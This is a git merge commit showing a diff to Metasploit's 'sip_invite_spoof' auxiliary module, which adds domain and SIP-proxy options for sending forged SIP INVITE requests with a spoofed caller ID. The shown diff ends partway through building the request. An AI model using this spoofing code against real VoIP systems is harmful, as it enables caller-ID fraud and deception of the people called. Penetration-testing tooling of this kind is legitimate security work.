Merge branch 'master' of git://github.com/rapid7/metasploit-framework

2012-11-09 09:47:51 +01:00 · 2012-11-09 09:47:51 +01:00 · 9b28a8d9e3
parent da029bab67 08d56e31e1
commit 9b28a8d9e3
1 changed files with 28 additions and 5 deletions
--- a/modules/auxiliary/voip/sip_invite_spoof.rb
+++ b/modules/auxiliary/voip/sip_invite_spoof.rb
@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         =>
 				[
-					'David Maynor <dave[at]erratasec.com>',
-					'ChrisJohnRiley'
+					'David Maynor <dave[at]erratasec.com>', # original module
+					'ChrisJohnRiley' # modifications
 				],
 			'License'        =>  MSF_LICENSE
 		)
@ -33,7 +33,13 @@ class Metasploit3 < Msf::Auxiliary
 				Opt::RPORT(5060),
 				OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']),
 				OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]),
-				OptString.new('EXTENSION', [false, "The specific extension or name to target", nil])
+				OptString.new('EXTENSION', [false, "The specific extension or name to target", nil]),
+				OptString.new('DOMAIN', [false, "Use a specific SIP domain", nil])
+			], self.class)
+		register_advanced_options(
+			[
+				OptAddress.new('SIP_PROXY_NAME', [false, "Use a specific SIP proxy", nil]),
+				OptPort.new('SIP_PROXY_PORT', [false, "SIP Proxy port to use", 5060])
 			], self.class)
 	end

@ -45,19 +51,36 @@ class Metasploit3 < Msf::Auxiliary
 			name = datastore['MSG']
 			src = datastore['SRCADDR']
 			ext = datastore['EXTENSION']
+			dom = datastore['DOMAIN']
+			sphost = datastore['SIP_PROXY_NAME']
+			spport = datastore['SIP_PROXY_PORT'] || 5060
+			conn_string = ''

 			if not ext.nil? and not ext.empty?
 				# set extesion name/number
-				conn_string = "#{ext}@#{ip}"
+				conn_string = "#{ext}@"
+			end
+
+			if not dom.nil? and not dom.empty?
+				# set domain
+				conn_string << "#{dom}"
 			else
-				conn_string = "#{ip}"
+				conn_string << "#{ip}"
+			end
+
+			# set Route header if SIP_PROXY is set
+			if not sphost.nil? and not sphost.empty?
+				route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"
 			end

 			connect_udp

 			print_status("Sending Fake SIP Invite to: #{conn_string}")
+			print_status("Using SIP proxy #{sphost}:#{spport}") if route

 			req =  "INVITE sip:#{conn_string} SIP/2.0" + "\r\n"
+			# add Route: header to req if SIP_PROXY is set
+			req << route if route
 			req << "To: <sip:#{conn_string}>" + "\r\n"
 			req << "Via: SIP/2.0/UDP #{ip}" + "\r\n"
 			req << "From: \"#{name}\"<sip:#{src}>" + "\r\n"